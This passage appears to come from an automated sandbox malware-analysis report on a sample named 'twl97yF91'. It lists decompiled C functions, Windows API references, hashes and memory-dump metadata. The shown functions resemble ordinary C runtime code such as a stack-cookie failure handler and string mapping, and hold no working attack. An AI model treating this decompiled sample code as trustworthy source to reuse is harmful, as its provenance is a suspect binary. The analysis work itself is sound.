                                                                                                                                                                                                          				 *0x423b94 = _t22;
                                                                                                                                                                                                          				 *0x423b90 = _t25;
                                                                                                                                                                                                          				 *0x423b8c = _t21;
                                                                                                                                                                                                          				 *0x423b88 = _t27;
                                                                                                                                                                                                          				 *0x423b84 = _t26;
                                                                                                                                                                                                          				 *0x423bb0 = ss;
                                                                                                                                                                                                          				 *0x423ba4 = cs;
                                                                                                                                                                                                          				 *0x423b80 = ds;
                                                                                                                                                                                                          				 *0x423b7c = es;
                                                                                                                                                                                                          				 *0x423b78 = fs;
                                                                                                                                                                                                          				 *0x423b74 = gs;
                                                                                                                                                                                                          				asm("pushfd");
                                                                                                                                                                                                          				_pop( *0x423ba8);
                                                                                                                                                                                                          				 *0x423b9c =  *_t31;
                                                                                                                                                                                                          				 *0x423ba0 = _v0;
                                                                                                                                                                                                          				 *0x423bac =  &_a4;
                                                                                                                                                                                                          				 *0x423ae8 = 0x10001;
                                                                                                                                                                                                          				_t11 =  *0x423ba0; // 0x0
                                                                                                                                                                                                          				 *0x423a9c = _t11;
                                                                                                                                                                                                          				 *0x423a90 = 0xc0000409;
                                                                                                                                                                                                          				 *0x423a94 = 1;
                                                                                                                                                                                                          				_t12 =  *0x422234; // 0xa61828c8
                                                                                                                                                                                                          				_v812 = _t12;
                                                                                                                                                                                                          				_t13 =  *0x422238; // 0x59e7d737
                                                                                                                                                                                                          				_v808 = _t13;
                                                                                                                                                                                                          				 *0x423ae0 = IsDebuggerPresent();
                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                          				E004138FC(_t14);
                                                                                                                                                                                                          				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                          				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                                                                                                                          				if( *0x423ae0 == 0) {
                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                          					E004138FC(_t17);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                          			}




















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                          • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040ADB0(intOrPtr* __ecx) {
                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                          				intOrPtr* _t11;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t11 = __ecx;
                                                                                                                                                                                                          				_t5 =  *(__ecx + 8);
                                                                                                                                                                                                          				 *__ecx = 0x41eff0;
                                                                                                                                                                                                          				if(_t5 != 0) {
                                                                                                                                                                                                          					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *(_t11 + 0xc) != 0) {
                                                                                                                                                                                                          					_t5 = GetProcessHeap();
                                                                                                                                                                                                          					if(_t5 != 0) {
                                                                                                                                                                                                          						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t5;
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                          • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                          • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.322608961.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_3050000_twl97yF91.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e40cc5b7fe0decf067d30f896caf04ab4924459579739271318f1b8fa1602008
                                                                                                                                                                                                          • Instruction ID: 894e8016728872cc9f7999b520d0c4e3fedff4379bfa81a67af3545e08d7bc0d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e40cc5b7fe0decf067d30f896caf04ab4924459579739271318f1b8fa1602008
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E41FEB4D11248CFDB10CFA9C985BDEFBF1BB09304F248029E859AB250DB749985CF85
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                          				intOrPtr _t112;
                                                                                                                                                                                                          				intOrPtr _t113;
                                                                                                                                                                                                          				short* _t115;
                                                                                                                                                                                                          				short* _t116;
                                                                                                                                                                                                          				char* _t120;
                                                                                                                                                                                                          				short* _t121;
                                                                                                                                                                                                          				short* _t123;
                                                                                                                                                                                                          				short* _t127;
                                                                                                                                                                                                          				int _t128;
                                                                                                                                                                                                          				short* _t141;
                                                                                                                                                                                                          				signed int _t144;
                                                                                                                                                                                                          				void* _t146;
                                                                                                                                                                                                          				short* _t147;
                                                                                                                                                                                                          				signed int _t150;
                                                                                                                                                                                                          				short* _t153;
                                                                                                                                                                                                          				char* _t157;
                                                                                                                                                                                                          				int _t160;
                                                                                                                                                                                                          				long _t162;
                                                                                                                                                                                                          				signed int _t174;
                                                                                                                                                                                                          				signed int _t178;
                                                                                                                                                                                                          				signed int _t179;
                                                                                                                                                                                                          				int _t182;
                                                                                                                                                                                                          				short* _t184;
                                                                                                                                                                                                          				signed int _t186;
                                                                                                                                                                                                          				signed int _t188;
                                                                                                                                                                                                          				short* _t189;
                                                                                                                                                                                                          				int _t191;
                                                                                                                                                                                                          				intOrPtr _t194;
                                                                                                                                                                                                          				int _t207;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t110 =  *0x422234; // 0xa61828c8
                                                                                                                                                                                                          				_v8 = _t110 ^ _t188;
                                                                                                                                                                                                          				_t184 = __ecx;
                                                                                                                                                                                                          				_t194 =  *0x423e7c; // 0x1
                                                                                                                                                                                                          				if(_t194 == 0) {
                                                                                                                                                                                                          					_t182 = 1;
                                                                                                                                                                                                          					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                                                                                                                          						_t162 = GetLastError();
                                                                                                                                                                                                          						__eflags = _t162 - 0x78;
                                                                                                                                                                                                          						if(_t162 == 0x78) {
                                                                                                                                                                                                          							 *0x423e7c = 2;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *0x423e7c = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_a16 <= 0) {
                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                          					_t112 =  *0x423e7c; // 0x1
                                                                                                                                                                                                          					if(_t112 == 2 || _t112 == 0) {
                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                          						__eflags = _a4;
                                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                                          							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _a28;
                                                                                                                                                                                                          						if(_a28 == 0) {
                                                                                                                                                                                                          							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                                                                                                                                                          						_v24 = _t113;
                                                                                                                                                                                                          						__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                          						if(_t113 != 0xffffffff) {
                                                                                                                                                                                                          							__eflags = _t113 - _a28;
                                                                                                                                                                                                          							if(_t113 == _a28) {
                                                                                                                                                                                                          								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                          								L78:
                                                                                                                                                                                                          								__eflags = _v16;
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									_push(_v16);
                                                                                                                                                                                                          									E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t115 = _v20;
                                                                                                                                                                                                          								__eflags = _t115;
                                                                                                                                                                                                          								if(_t115 != 0) {
                                                                                                                                                                                                          									__eflags = _a20 - _t115;
                                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                                          										_push(_t115);
                                                                                                                                                                                                          										E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t116 = _t184;
                                                                                                                                                                                                          								goto L84;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                                                                                                          							_t191 =  &(_t189[0xc]);
                                                                                                                                                                                                          							_v16 = _t120;
                                                                                                                                                                                                          							__eflags = _t120;
                                                                                                                                                                                                          							if(_t120 == 0) {
                                                                                                                                                                                                          								goto L58;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                                                                                                          							_v12 = _t121;
                                                                                                                                                                                                          							__eflags = _t121;
                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                          								if(__eflags <= 0) {
                                                                                                                                                                                                          									L71:
                                                                                                                                                                                                          									_t182 = 0;
                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                          									L72:
                                                                                                                                                                                                          									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                                          								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                                          								__eflags = _t153;
                                                                                                                                                                                                          								if(_t153 == 0) {
                                                                                                                                                                                                          									L27:
                                                                                                                                                                                                          									_v16 = _t153;
                                                                                                                                                                                                          									goto L29;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *_t153 = 0xdddd;
                                                                                                                                                                                                          								L26:
                                                                                                                                                                                                          								_t153 =  &(_t153[4]);
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E0040CFB0(_t152);
                                                                                                                                                                                                          							_t153 = _t189;
                                                                                                                                                                                                          							if(_t153 == 0) {
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							 *_t153 = 0xcccc;
                                                                                                                                                                                                          							goto L26;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t178 = _a16;
                                                                                                                                                                                                          				_t157 = _a12;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t178 = _t178 - 1;
                                                                                                                                                                                                          					if( *_t157 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t157 =  &(_t157[1]);
                                                                                                                                                                                                          					if(_t178 != 0) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t178 = _t178 | 0xffffffff;
                                                                                                                                                                                                          					break;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t160 = _a16 - _t178 - 1;
                                                                                                                                                                                                          				if(_t160 < _a16) {
                                                                                                                                                                                                          					_t160 = _t160 + 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_a16 = _t160;
                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                          			}











































                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417375
                                                                                                                                                                                                          0x0041734b
                                                                                                                                                                                                          0x00417350
                                                                                                                                                                                                          0x00417352
                                                                                                                                                                                                          0x00417354
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417356
                                                                                                                                                                                                          0x0041735c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041735c
                                                                                                                                                                                                          0x00417333
                                                                                                                                                                                                          0x00417333
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417117
                                                                                                                                                                                                          0x0041711a
                                                                                                                                                                                                          0x004172ec
                                                                                                                                                                                                          0x004172ec
                                                                                                                                                                                                          0x00417414
                                                                                                                                                                                                          0x00417425
                                                                                                                                                                                                          0x00417425
                                                                                                                                                                                                          0x00417120
                                                                                                                                                                                                          0x00417126
                                                                                                                                                                                                          0x0041712d
                                                                                                                                                                                                          0x0041712d
                                                                                                                                                                                                          0x00417130
                                                                                                                                                                                                          0x00417153
                                                                                                                                                                                                          0x00417155
                                                                                                                                                                                                          0x00417157
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041715d
                                                                                                                                                                                                          0x0041715d
                                                                                                                                                                                                          0x004171a2
                                                                                                                                                                                                          0x004171a2
                                                                                                                                                                                                          0x004171a5
                                                                                                                                                                                                          0x004171a8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004171c1
                                                                                                                                                                                                          0x004172aa
                                                                                                                                                                                                          0x004172ad
                                                                                                                                                                                                          0x004172b2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004172b5
                                                                                                                                                                                                          0x004171c7
                                                                                                                                                                                                          0x004171db
                                                                                                                                                                                                          0x004171dd
                                                                                                                                                                                                          0x004171e2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004171ef
                                                                                                                                                                                                          0x0041721a
                                                                                                                                                                                                          0x0041721c
                                                                                                                                                                                                          0x00417263
                                                                                                                                                                                                          0x00417263
                                                                                                                                                                                                          0x00417263
                                                                                                                                                                                                          0x00417265
                                                                                                                                                                                                          0x00417265
                                                                                                                                                                                                          0x00417267
                                                                                                                                                                                                          0x00417277
                                                                                                                                                                                                          0x0041727d
                                                                                                                                                                                                          0x0041727f
                                                                                                                                                                                                          0x00417281
                                                                                                                                                                                                          0x00417282
                                                                                                                                                                                                          0x00417283
                                                                                                                                                                                                          0x00417286
                                                                                                                                                                                                          0x0041728c
                                                                                                                                                                                                          0x0041728f
                                                                                                                                                                                                          0x00417288
                                                                                                                                                                                                          0x00417288
                                                                                                                                                                                                          0x00417289
                                                                                                                                                                                                          0x00417289
                                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                                          0x004172a4
                                                                                                                                                                                                          0x004172a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417267
                                                                                                                                                                                                          0x00417222
                                                                                                                                                                                                          0x00417223
                                                                                                                                                                                                          0x00417225
                                                                                                                                                                                                          0x00417228
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041722a
                                                                                                                                                                                                          0x0041722a
                                                                                                                                                                                                          0x0041722e
                                                                                                                                                                                                          0x00417233
                                                                                                                                                                                                          0x0041724c
                                                                                                                                                                                                          0x00417252
                                                                                                                                                                                                          0x00417254
                                                                                                                                                                                                          0x00417256
                                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                                          0x0041725f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041725f
                                                                                                                                                                                                          0x00417235
                                                                                                                                                                                                          0x0041723a
                                                                                                                                                                                                          0x0041723c
                                                                                                                                                                                                          0x0041723e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417240
                                                                                                                                                                                                          0x00417246
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417246
                                                                                                                                                                                                          0x004171f4
                                                                                                                                                                                                          0x00417213
                                                                                                                                                                                                          0x00417213
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004171f4
                                                                                                                                                                                                          0x00417163
                                                                                                                                                                                                          0x00417164
                                                                                                                                                                                                          0x00417169
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041716b
                                                                                                                                                                                                          0x0041716b
                                                                                                                                                                                                          0x00417174
                                                                                                                                                                                                          0x0041718a
                                                                                                                                                                                                          0x00417190
                                                                                                                                                                                                          0x00417192
                                                                                                                                                                                                          0x0041719d
                                                                                                                                                                                                          0x0041719d
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02E318B0), ref: 004170C5
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                          • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                          • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                          • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3809854901-0
                                                                                                                                                                                                          • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                          • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02CC731A
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 02CC732C
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CC73F1
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CC74B3
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 02CC74DE
